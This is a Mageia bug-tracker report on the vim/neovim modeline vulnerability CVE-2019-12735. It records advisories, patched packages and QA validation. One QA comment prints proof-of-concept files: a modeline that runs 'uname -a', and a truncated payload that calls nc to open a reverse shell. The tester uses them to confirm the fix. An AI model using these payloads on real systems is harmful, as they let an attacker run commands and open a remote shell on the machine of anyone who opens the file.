| Summary: | vim, neovim new security issue CVE-2019-12735 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | major | ||
| Priority: | Normal | CC: | andrewsfarm, marja11, mhrambo3501, pkg-bugs, qa-bugs, smelror, sysadmin-bugs, tarazed25, thierry.vignaud, tmb |
| Version: | 7 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA7-64-OK | ||
| Source RPM: | vim-8.1.1048-1.mga7.src.rpm, neovim-0.3.5-1.mga7.src.rpm | CVE: | |
| Status comment: | |||
|
Description
David Walser
2019-06-06 14:20:11 CEST
David Walser
2019-06-06 14:20:20 CEST
Whiteboard:
(none) =>
MGA7TOO, MGA6TOO Assigning to the neovim maintainer, because he might have more time than the vim maintainer. CC'ing the vim maintainer. CC:
(none) =>
marja11, thierry.vignaud Neovim 0.3.7 pushed to updates_testing RedHat has issued an advisory for vim on June 26: https://access.redhat.com/errata/RHSA-2019:1619 Advisory ======== Neovim has been updated to fix a security issue. CVE-2019-12735: getchar.c in Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by assert_fails or nvim_input in Neovim. References ========== https://nvd.nist.gov/vuln/detail/CVE-2019-12735 Files ===== Uploaded to core/updates_testing neovim-0.3.7-1.mga7 neovim-data-0.3.7-1.mga7 from neovim-0.3.7-1.mga7.src.rpm
Stig-Ørjan Smelror
2019-07-04 19:34:02 CEST
Assignee:
smelror =>
qa-bugs vim needs to be fixed too. Version:
Cauldron =>
7 Debian has issued an advisory for this on June 13: https://www.debian.org/security/2019/dsa-4467 Ubuntu has issued advisories for this on June 11: https://usn.ubuntu.com/4016-1/ https://usn.ubuntu.com/4016-2/ Severity:
normal =>
major Debian has issued an advisory for this on July 23: https://www.debian.org/security/2019/dsa-4487 Fedora has issued an advisory for vim on June 6: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/ We are still missing a vim update for Mageia 7. Someone please take care of it. CC:
(none) =>
pkg-bugs
David Walser
2020-01-14 18:09:23 CET
Status comment:
(none) =>
neovim has been updated, vim update still needed Patched package uploaded for Mageia 7. Advisory: ======================== Updated vim package fixes security vulnerabilities: It was discovered that Vim before 8.1.1365 and Neovim before 0.3.6 did not restrict the `:source!` command when executed in a sandbox. This allows remote attackers to take advantage of the modeline feature to inject arbitrary commands when a specially crafted file is opened (CVE-2019-12735). References: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/ https://nvd.nist.gov/vuln/detail/CVE-2019-12735 ======================== Updated packages in core/updates_testing: ======================== vim-common-8.1.1048-1.1.mga7.x86_64.rpm vim-enhanced-8.1.1048-1.1.mga7.x86_64.rpm vim-minimal-8.1.1048-1.1.mga7.x86_64.rpm vim-X11-8.1.1048-1.1.mga7.x86_64.rpm from vim-8.1.1048-1.1.mga7.src.rpm Whiteboard:
MGA6TOO =>
(none) Thanks. We'll need to clarify in the advisory that this update includes both vim and neovim. Status comment:
neovim has been updated, vim update still needed =>
(none) mga7, x86_64 $ rpm -qa | grep neovim neovim-0.3.5-1.mga7 neovim-data-0.3.5-1.mga7 nodejs-neovim-4.5.0-1.mga7 CVE-2019-12735 https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md Two PoC available. $ cat poc.txt :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" $ cat shell.txt \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 999! *Before update* This test demonstrates the vulnerability. $ nvim poc.txt <This executes the 'uname -a' command> Linux canopus 5.1.14-desktop-1.mga7 #1 SMP Sat Jun 22 10:35:14 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux Press ENTER or type command to continue :q $ nvim shell.txt This starts a normal vi session without the reverse terminal and system call. $ grep nomodelines /usr/share/vim/vimrc returns nothing. nomodelines is supposed to prevent the use of custom modelines in files to be edited by vim. So in the default configuration file that protection is not there. However, the exploit is not delivered either, which implies that the vulnerability has already been patched. *After update* - neovim-0.3.7-1.mga7.x86_64 - neovim-data-0.3.7-1.mga7.noarch - vim-common-8.1.1048-1.1.mga7.x86_64 - vim-enhanced-8.1.1048-1.1.mga7.x86_64 - vim-minimal-8.1.1048-1.1.mga7.x86_64 - vim-X11-8.1.1048-1.1.mga7.x86_64 $ nvim shell.txt Normal session, as before. $ nvim poc.txt Normal session, so the problem has been fixed. For good measure, running these two tests with the vim, vi variants returned the same results. Finished off this report using nvim. *vim looks OK. CC:
(none) =>
tarazed25 Validating. Advisory information in Comment 4, Comment 9, and Comment 10. Keywords:
(none) =>
validated_update
Thomas Backlund
2020-02-13 11:04:25 CET
CC:
(none) =>
tmb An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0082.html Resolution:
(none) =>
FIXED |